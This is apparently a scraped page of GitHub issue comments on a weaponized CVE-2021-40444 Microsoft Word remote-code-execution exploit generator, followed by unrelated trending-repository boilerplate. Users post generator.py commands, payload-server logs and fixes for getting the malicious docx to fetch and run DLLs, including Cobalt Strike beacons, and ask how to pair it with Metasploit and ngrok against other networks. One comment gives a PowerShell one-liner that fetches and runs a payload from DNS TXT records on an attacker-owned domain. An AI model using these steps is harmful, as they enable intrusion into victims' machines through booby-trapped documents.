CVE-2021-40444 - Fully Weaponized Microsoft Office Word RCE Exploit
Senior Security Noob
Tooling around in my own free time, whenever my beloved kid is not playing with the keyboard. xD
](https://github.com/klezVirus)
Hi, I'm the author of in_place, which this project uses in generator.py, and I'm letting you know that the upcoming v1.0 of in_place will bring API changes that will break your code; see this issue for more information.
Until v1.0 is released and your code is updated, I would suggest restricting the in_place version in your requirements.txt like so:
in_place < 1.0
I first tested with the repo i downloaded 2 days ago. All works.
Then I tested with the latest download.
So it seems that the user should have had to run a .wsf file before manually
Experiencing where the Word intermittently drops msword.inf in %TEMP%. I click the Word document, it works. Close Word. Clean %TEMP% out. Then click Word document again, and it does not work. I see consistent GET requests for the cab file each time Word document is opened. Any help would be greatly appreciated to get Word to drop consistently.
So this is strange, I tested it with calc.dll, It works.
On same VM, same server, same settings i used cobalt strikes beacon (tried 32 and 64 bit dll) but it does not work
the inf file downloads to the correct location (temp)
but does not execute correctly
I manually run the inf file that was downloaded by typing C:\Users\User\AppData\Local\Temp>rundll32.exe XQ3H4QH3S1XH.inf, start
and the payload executes
how to combine with metasploit for exploiting different networks and ngrok
┌──(kali㉿kali)-[~/CVE-2021-40444]
└─$ python3 generator.py -u http://127.0.0.1 -P test/calc.dll --host 1 ⨯
[] Generating a malicious payload...
[] Multiple compatible templates identified, choose one:
0: cab-orig-debobfuscated2.html
1: cab-orig-debobfuscated1.html
2: cab-orig-j00sean.html
3: cab-orig-obfuscated.html
$> 3
[>] Payload: test/calc.dll
[>] HTML/CAB/JS Hosting Server: http://127.0.0.1
[] Crafting Relationships to point to HTML/CAB/JS Hosting Server...
[] Packing MS Word .docx file...
[*] Generating CAB file...
/bin/sh: 1: makecab: not found
Command 'makecab /F "/home/kali/CVE-2021-40444/data/mswordcab.ddf"' returned non-zero exit status 127.
I have spend many hours trying to get it to work.
I checked the urls. so if i paste the url: mhtml:https://mydomain.com/test/BF2W7C4FOLB0.html!x-usc:https:/mydomain.com/test/BF2W7C4FOLB0.html into IE then I get the INF file downloaded to the Temp folder.
So the url is working.
But when the generated document is opened, I do see the "Contacting the server for information" message
But the INF file is not downloaded..
What or where could i start troubleshooting?
I have tried on localhost, port 80
code:
generator.py -P new.dll -p 80 -u http://localhost -o BF2W7C4FOLB0 --host
Output when docx is opened:
Serving HTTP on :: port 80 (http://[::]:80/) ...
::1 - - [19/Sep/2021 03:36:13] code 501, message Unsupported method ('OPTIONS')
::1 - - [19/Sep/2021 03:36:13] "OPTIONS / HTTP/1.1" 501 -
::1 - - [19/Sep/2021 03:36:15] "HEAD /BF2W7C4FOLB0.html HTTP/1.1" 200 -
::1 - - [19/Sep/2021 03:36:15] code 501, message Unsupported method ('OPTIONS')
::1 - - [19/Sep/2021 03:36:15] "OPTIONS / HTTP/1.1" 501 -
::1 - - [19/Sep/2021 03:36:16] "GET /BF2W7C4FOLB0.html HTTP/1.1" 200 -
::1 - - [19/Sep/2021 03:36:16] "HEAD /BF2W7C4FOLB0.html HTTP/1.1" 200 -
::1 - - [19/Sep/2021 03:36:16] "HEAD /BF2W7C4FOLB0.html HTTP/1.1" 200 -
::1 - - [19/Sep/2021 03:36:16] code 501, message Unsupported method ('OPTIONS')
::1 - - [19/Sep/2021 03:36:16] "OPTIONS / HTTP/1.1" 501 -
::1 - - [19/Sep/2021 03:36:18] "HEAD /BF2W7C4FOLB0.html HTTP/1.1" 200 -
::1 - - [19/Sep/2021 03:36:18] code 501, message Unsupported method ('OPTIONS')
::1 - - [19/Sep/2021 03:36:18] "OPTIONS / HTTP/1.1" 501 -
::1 - - [19/Sep/2021 03:36:18] "GET /BF2W7C4FOLB0.html HTTP/1.1" 304 -
::1 - - [19/Sep/2021 03:36:18] "HEAD /BF2W7C4FOLB0.html HTTP/1.1" 200 -
::1 - - [19/Sep/2021 03:36:18] "HEAD /BF2W7C4FOLB0.html HTTP/1.1" 200 -
::1 - - [19/Sep/2021 03:36:18] "GET /BF2W7C4FOLB0.cab HTTP/1.1" 200 -
::1 - - [19/Sep/2021 03:36:19] "HEAD /BF2W7C4FOLB0.html HTTP/1.1" 200 -
Hi,
I used
python generator.py -u http://127.0.0.1 -P test\calc.dll --host
To generate the exploit. When opening the docx to test locally, here is what showing up on the payload server
127.0.0.1 - - [14/Jul/2022 23:09:20] "OPTIONS / HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "GET /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "OPTIONS / HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "GET /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "GET /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:21] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
What could be wrong? or am I missing something?
Firstly, thank you for the amazing work! I am fascinated.
I tried this on two machines, one a windows 7 and one windows 10 latest. Both seem to have the same issue. The web server is not hosted. It seems that the window just flashes for a second and exits. Please see video below
What is the cause of this error?
C:\Users\Adam\Desktop\WORD exploit>python generator.py -u http://127.0.0.1 -P test\calc.dll --host
[*] Generating a malicious payload...
[*] Multiple compatible templates identified, choose one:
0: cab-orig-debobfuscated1.html
1: cab-orig-debobfuscated2.html
2: cab-orig-j00sean.html
3: cab-orig-obfuscated.html
$> 1
[>] Payload: test\calc.dll
[>] HTML/CAB/JS Hosting Server: http://127.0.0.1
[*] Crafting Relationships to point to HTML/CAB/JS Hosting Server...
[*] Packing MS Word .docx file...
[*] Generating CAB file...
Command 'makecab /F "C:\Users\ADAM\Desktop\WORD exploit\data\mswordcab.ddf"' returned non-zero exit status 1.
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.175.139 - - [08/Oct/2021 23:11:32] code 501, message Unsupported method ('OPTIONS')
192.168.175.139 - - [08/Oct/2021 23:11:32] "OPTIONS / HTTP/1.1" 501 -
192.168.175.139 - - [08/Oct/2021 23:11:32] code 404, message File not found
192.168.175.139 - - [08/Oct/2021 23:11:32] "HEAD /word.html HTTP/1.1" 404 -
192.168.175.139 - - [08/Oct/2021 23:11:35] code 501, message Unsupported method ('OPTIONS')
192.168.175.139 - - [08/Oct/2021 23:11:35] "OPTIONS / HTTP/1.1" 501 -
192.168.175.139 - - [08/Oct/2021 23:11:35] code 404, message File not found
192.168.175.139 - - [08/Oct/2021 23:11:35] "GET /word.html HTTP/1.1" 404 -
add a requirements.txt at your project root.
requirements.txt:
in-place
Can we use this to execute shell commands?
Sorry, I can pop up the calc program normally in the local test, but when I use cobaltstrike to generate a malicious DLL for test, I found that the inf can be downloaded to the% temp% directory normally, but I don't know what happened during the loading process, resulting in the failure to execute the DLL normally. In general, my idea of loading cobaltstrike DLL has failed. I really want to know why. If you are interested in testing it. My version of windows is professional version 10.0.10240. Thank you.
Hello @klezVirus thanks for you work, and your tools!
How to build follina doc without hosting, just with command/payload file (ps1, raw, txt..)
#maybe it can be useful https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed
Here is function to use real doc.
dinvoke, directl syscalls or method to get payload from dns records
#"powershell . (nslookup -q=txt some.owned.domain.com)[-1]"
#(nslookup -q=txt # some.owned.domain.com)[-1]"?
https://github.com/rtfmkiesel/goldig (cool)
#https://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina
Rtf no click (folder visit)
And main question is
Using another service not mstd
https://lolbas-project.github.io/#
List of em who can execute and bypass some.
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.